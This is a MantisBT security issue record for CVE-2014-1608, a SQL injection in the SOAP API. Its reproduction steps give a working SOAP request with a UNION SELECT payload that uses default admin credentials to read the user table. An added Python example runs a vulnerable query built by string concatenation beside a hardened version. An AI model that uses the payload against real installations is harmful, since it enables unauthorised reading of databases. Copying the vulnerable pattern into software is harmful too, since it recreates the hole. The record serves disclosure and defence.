2014-11-27 01:33 EST

ID: 0016879
Project: mantisbt
Category: security
View Status: public
Last Update: 2014-02-07 18:24
Reporter: dregad
Assigned To: dregad
Priority: immediate
Severity: major
Reproducibility: have not tried
Status: closed
Resolution: fixed
Product Version: 1.1.0a4
Target Version: 1.2.16
Fixed in Version: 1.2.16
Summary: 0016879: CVE-2014-1608: soap:Envelope SQL injection attack
Description: The SOAP API can be used for SQL injection attacks.

Pasting relevant extracts of the original e-mail report below

-----------------

The xml sent to the soap webservice is sometimes validated, sometimes not. This
is independent of the php.ini and seems to be dependent on the php binary.
The php binaries on the different systems (I used the thoughtpolice images)
differ in the libxml2 version. But I am not quite sure this is the reason.

It is definitely still an issue, but it's not 100% sure whether the
responsibility is 100% at mantisbt.org.

The XML request cannot be issued without a user account. The request allows
reading the contents of the entire mantis database no matter what the user's
access permissions are. Mantis often is used with many projects and has a
fine-grained permission structure.
Steps To Reproduce: If you would like to reproduce the issue, you could issue the following
request to a current mantis system (1.2.15), maybe on a recent CentOS image
from thoughtpolice (http://sourceforge.net/projects/thoughtpolicevm/). This
example uses the administrator account, because it is enabled by default...

<?xml version="1.0" encoding="utf-8"?><soap:Envelope
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xmlns:xsd="http://www.w3.org/2001/XMLSchema"
xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><mc_issue_attachment_get
xmlns="http://futureware.biz/mantisconnect"><username>administrator</username><password>root</password><issue_attachment_id>'
UNION SELECT 927,3358,1337,313373,1,1,1,1,1,username,23,42 FROM
mantis_user_table WHERE mantis_user_table.id=1 ORDER BY
bug_id,'true</issue_attachment_id></mc_issue_attachment_get></soap:Body></soap:Envelope>

This request selects the username from mantis_user_table with id=1. The
output is base64-encoded.
Additional Information: This issue was initially discovered and reported by e-mail by Andrea Barisani from oCERT, on behalf of Martin Herfurt <martin.herfurt@nruns.com>, a security researcher at n.runs professionals GmbH (https://www.nruns.com), who discovered the issue during an audit at a customer's site on an up-to-date machine with the latest Mantis version (1.2.15).
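The report makes two points a defender should take from this issue: the transport-level XML validation cannot be relied on (it depends on the libxml2 build behind the PHP binary), and a SOAP parameter declared as an integer still reaches the SQL layer as attacker-controlled text. The following Python/sqlite3 example is added here for illustration and is not MantisBT's code nor grangeway's fix. It places the pre-fix pattern (parameter spliced into the query string) beside a hardened form (application-side integer check plus a bound parameter). mantis_user_table is named in the report; the attachment table name, all column layouts and the sample rows are constructed assumptions, and the report's UNION payload is trimmed to the four columns of the toy table.

```python
import re
import sqlite3

# Constructed toy schema. mantis_user_table is named in the report; the
# attachment table name and all column layouts here are simplified assumptions,
# not MantisBT's real schema.
SCHEMA = """
CREATE TABLE mantis_bug_file_table (
    id INTEGER PRIMARY KEY, bug_id INTEGER, title TEXT, filename TEXT);
CREATE TABLE mantis_user_table (
    id INTEGER PRIMARY KEY, username TEXT, password TEXT);
INSERT INTO mantis_bug_file_table VALUES (1, 10, 'screenshot', 'shot.png');
INSERT INTO mantis_user_table VALUES (1, 'administrator', 'hash-placeholder');
"""

# The report's payload shape, trimmed to the four columns of the toy table above.
PAYLOAD = ("' UNION SELECT 927,3358,username,'x' FROM mantis_user_table "
           "WHERE mantis_user_table.id=1 -- ")


def open_db():
    """Fresh in-memory database populated with the constructed sample rows."""
    conn = sqlite3.connect(":memory:")
    conn.executescript(SCHEMA)
    return conn


def attachment_get_vulnerable(conn, attachment_id):
    """Pre-fix pattern: the SOAP parameter is spliced into the SQL text, so
    whatever the caller sends is parsed as SQL."""
    query = ("SELECT id, bug_id, title, filename FROM mantis_bug_file_table "
             "WHERE id='" + str(attachment_id) + "'")
    return conn.execute(query).fetchall()


def parse_attachment_id(value):
    """Application-side type check. The report notes that the SOAP/libxml2
    layer validates the XML only on some builds, so the integer contract is
    enforced here regardless of what the transport did."""
    if isinstance(value, bool) or not isinstance(value, (int, str)):
        raise ValueError("issue_attachment_id must be an integer")
    text = str(value).strip()
    if not re.fullmatch(r"[0-9]+", text):
        raise ValueError("issue_attachment_id must be a non-negative integer")
    return int(text)


def attachment_get_fixed(conn, attachment_id):
    """Hardened form: validated integer, passed as a bound parameter so the
    value is data to the database driver and never SQL text."""
    query = ("SELECT id, bug_id, title, filename FROM mantis_bug_file_table "
             "WHERE id=?")
    return conn.execute(query, (parse_attachment_id(attachment_id),)).fetchall()


def demo():
    """Runs both variants against the same payload and against a legitimate id."""
    conn = open_db()
    leaked = attachment_get_vulnerable(conn, PAYLOAD)   # row from the user table
    try:
        attachment_get_fixed(conn, PAYLOAD)
        rejected = False
    except ValueError:
        rejected = True                                  # payload never reaches SQL
    legit = attachment_get_fixed(conn, "1")              # normal lookup still works
    return {"leaked": leaked, "rejected": rejected, "legit": legit}


if __name__ == "__main__":
    for key, val in demo().items():
        print(key, val)
```

The two layers in the hardened form are deliberately independent: even if the type check were bypassed, a bound parameter cannot terminate the string literal and append a UNION, and even without binding the type check would refuse the quote character. Either alone closes the path the report describes; keeping both means a later change to one does not silently reopen it.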
Tags: No tags attached.

Relationships
related to 0016880 (closed, dregad): CVE-2014-1609: SQL injection vulnerabilities
related to 0016898 (resolved, dregad): Dropping deprecated database API function db_query()

Notes

~0039161
dregad (developer)

grangeway quickly identified the root cause and provided a fix for the issue [1]

[1] https://github.com/grangeway/mantisbt/commit/b930f0e44481439ca5bca6b438e55641d139f7e2


Issue History
Date Modified Username Field Change
2014-01-24 10:26 dregad New Issue
2014-01-24 10:28 dregad Note Added: 0039161
2014-01-24 10:28 dregad Assigned To => grangeway
2014-01-24 10:28 dregad Status new => confirmed
2014-01-24 10:32 dregad Relationship added related to 0016880
2014-01-24 11:36 dregad Status confirmed => assigned
2014-01-24 11:36 dregad Product Version 1.2.15 => 1.1.0a4
2014-01-24 18:52 dregad Changeset attached => MantisBT master-1.2.x 00b4c170
2014-01-24 18:52 dregad Assigned To grangeway => dregad
2014-01-24 18:52 dregad Status assigned => resolved
2014-01-24 18:52 dregad Resolution open => fixed
2014-01-24 18:52 dregad Fixed in Version => 1.2.16
2014-01-24 18:52 dregad Changeset attached => MantisBT master 3be86ce3
2014-01-28 05:39 dregad Relationship added related to 0016898
2014-02-07 18:21 dregad View Status private => public
2014-02-07 18:24 dregad Status resolved => closed